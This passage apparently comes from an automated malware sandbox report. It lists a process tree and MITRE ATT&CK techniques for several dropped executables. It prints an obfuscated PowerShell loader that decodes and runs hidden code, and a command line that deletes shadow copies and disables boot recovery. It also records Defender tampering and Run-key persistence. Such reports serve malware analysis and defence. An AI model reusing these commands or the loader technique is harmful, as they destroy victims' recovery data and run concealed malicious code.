A Su'St9StE PECi9HeCBaEKuD MB ADDeD BD SFOlCKr8 OC S9Lv9UnA T8 M7 S9DbA FE G1JeEDr9NeCCo3 CCCa9HyCLiEinD TFPaDMo7 D9 S4 AFJe3 AF E5Pa9Re4 PFReC SDNo3AkDOr6 FDVeFSlE F7Ve8 K0 B8Pe0 TEGi8UnDSkF NDCaBLyDBaEDeF ABBrDAp6EjD A6ChFEr8exC P3PrCStEHgD KF ACBr9Eq9Re2Fy9MeE CFTi7yaD U3 RCTa9NeDVeC kD rB LCVa8KaCgaCReD T4SvD S3 DD D4CoDAlDTaDEtFOmD E4SeCTu9St8 B9 A8PlCFr8 T8 P9 F3an' S)Re;No`$ KBCioSpjFiaManVierurSa=In`$ CSSitfoa Ug UeHerLas T. TcHroDau Bn mtAk-Sk1Wo0Se2Sk4Wa; U&Dk(El`$SaQSvu WiRen UoBoc oa Vr JbOmo TnKoi Su GmFa7Se) C Ur( HPDirAriBevInaPun BtSh0Im4 E S'UnEUd1teESg9CoC H3KuCSp9ReCGaE SD CF BD h7 S9 R4 MEGa8drCKeFPlDPo4 FC SE SDCu3 UDOv7 GDBrFDi9 F4 VFAn3StDHy4NoCunEUnD MF OCBe8 PD R5GiCTiAcrE B9CaDCaF DCKa8KaCBeCInDFr3 ID M9PeDBuFbeC a9Li9Bi4crFPr7SiD PBBrCHa8BaCUn9MeD E2AnDKlB SDTr6RuESa7Be8 G0 a8 P0 HF S9 DD h5 KCBeA CCCa3 S9Ki2Pr9InE HEBe9 AC sEBaDMeBSkD TD PD UFEnCdo8 PC S9 H9Mu6sa9ReA l8JiB J8 BABi8 B8 S8KaE T9St6Sp9 UA S9NoEalESu9 KDTo1SvD NBStDCi8 SDShFInDIn6CrCHy9CeDJoFAuCSt9AaD P2BlD C3 CC F9AnCAnEInD h5 KCSy8 SDGl3 SD HF RCSa8UnD b4saDDiFfaC B9Un9 F6Tr9 EAUd9 KE CF A8HoDBe5SdDUn0GoD SB PD T4PrDHeF AC F8 L9Pi3Mi' F) D;Me& N(Ov`$WrQ Vu EiUnn ZoRnc Oa TrChbRooOsn MiHyuGem p7Lu) C U(EpPtvrLaiLavFia Tn Bt C0Ro4 S Za' H9InEadF SFCaCKaCIlDFyB FC EA UDTr5 UCCa8MyDce3AlC S0 SD DFTr9RvABo8 o7Ha9InAArECa1 BEBe9fdCva3 SC S9 OCAfE ADNiF sDBe7sk9Ac4ReE F8 SCsuF SDOv4RyCIoELaD r3PrDDe7LaDMaFGn9Ho4 CFRe3AuDin4 DCFaEReDShFDeC I8 FDLi5 BCMiA GE H9FoD SF GC B8FlC TCNoDIg3 RDOp9 GD BFEnC K9Kl9un4 CF U7 uDTrBBlC L8 SCSp9meD B2EtDOpBUnDTy6 PECl7 U8Kn0 S8Ha0 BFJeDAsDMeF MC RE LFKlE tDGhFUdD S6SpDTiFToD TDHoD RBSaC ME GDhuF SF CC VD R5 GCAn8 CFTiCFaCPaFLiDBo4LaDNe9 SCSeEAnDIn3HeDPr5SvDje4 VE LABiDSk5VaD B3 TDEg4 DCLeE UDPrF SCSu8Or9Sy2 B9Sk2DhDprCPuD e1 DC OAEn9StA H9 CEmaFWoDMiDOp6InDBa3 ODGaB PCAb9 P9 YASe9 UEopE D9LoDId1PrD c7ReDRe7TiD BFco9Fr3 B9 D6 M9mnA E9Ov2NoF ADloF IE AE FE C9chAFoFFoABe9 b2TaE P1 SFCa3 MDta4 OCPaESoEStA ICThESiC F8DiE B7Fo9 T6Es9 RAByE B1 PFBa3 SD I4DoC UE AELeA BC IE BC B8MiESc7sk9Pi6Me9UnACaESh1 MF D3 PD G4GeCFlE sE tAUnC NE ACKa8NaEro7sm9Fo3He9MaAPl9 A2LiE S1InFCo3 SDTh4ArCPeEsaEReA SC BE CCRy8HaESt7 E9Ek3gu9Bh3be9 S3Ka' a)Sp; m&Ly(re`$SkQ WuimiGrn Co nc SaggruvbSao AnAuiFlu Vmbn7Sk)Sk a( UPFur fiFavEna AnBrtPa0An4Un Sa'Un9AfE BFGlFInC fC UDViBCoC CAPaD S5FrCCo8GaDCu3HeCSe0kvDElF P9sy4HoF U3SaD I4 LC TCFoD I5 FDKr1AnDElFAf9Un2Tr8UnASa9 U6Sl9AtEVoEWa9 WD P1FoDCaBNeD L8 TDAbF UD A6 DC R9UnDheFBoCPe9 SDNe2 HD M3PrC G9PyC PEDaD E5 IC Q8chDst3FuD QFUnCTi8EtDFl4 FDDoF WCMi9 A9Sm6ro8 KALf9 O3Sm'Ma) V# C;""";Function Betingede9 { param([String]$Ernres); For($Marauders=2; $Marauders -lt $Ernres.Length-1; $Marauders+=(2+1)){ $Privant = $Privant + $Ernres.Substring($Marauders, 1); } $Privant;}$Lurkers0 = Betingede9 ' RI TEStXLi ';&$Lurkers0 (Betingede9 $Naught);<#Sprittens overvehementness Forfriskelse scariest #>;"
      4⤵
      PID:1328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6024 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5964 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5840 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:2076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5604 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5756 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1488
- C:\Users\Admin\Downloads\YzlhMGI2 (2).exe
  "C:\Users\Admin\Downloads\YzlhMGI2 (2).exe"
  2⤵
  PID:432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5532 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5348 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5736 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:4700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5504 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3152
- C:\Users\Admin\Downloads\ZmU2ZGYw.exe
  "C:\Users\Admin\Downloads\ZmU2ZGYw.exe"
  2⤵
  PID:656
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
    3⤵
    PID:2044
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:5004

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4360

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\x8891792.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\x8891792.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1488
- C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\f5166158.exe
  C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\f5166158.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2592
- C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\g3279811.exe
  C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\g3279811.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4604
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Suspicious behavior: EnumeratesProcesses
    PID:3428

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3892
- C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
  C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
  2⤵
  - Executes dropped EXE
  PID:3428
- C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
  C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
  2⤵
  - Executes dropped EXE
  PID:264

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4332
- C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
  C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
  2⤵
  - Executes dropped EXE
  PID:3108
- C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
  C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
  2⤵
  - Executes dropped EXE
  PID:4392

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
PID:4240
- C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
  C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
  2⤵
  PID:4616

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4324

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

Credential Access

Credentials in Files

T1081

Discovery

Process Discovery

T1057

Query Registry

System Information Discovery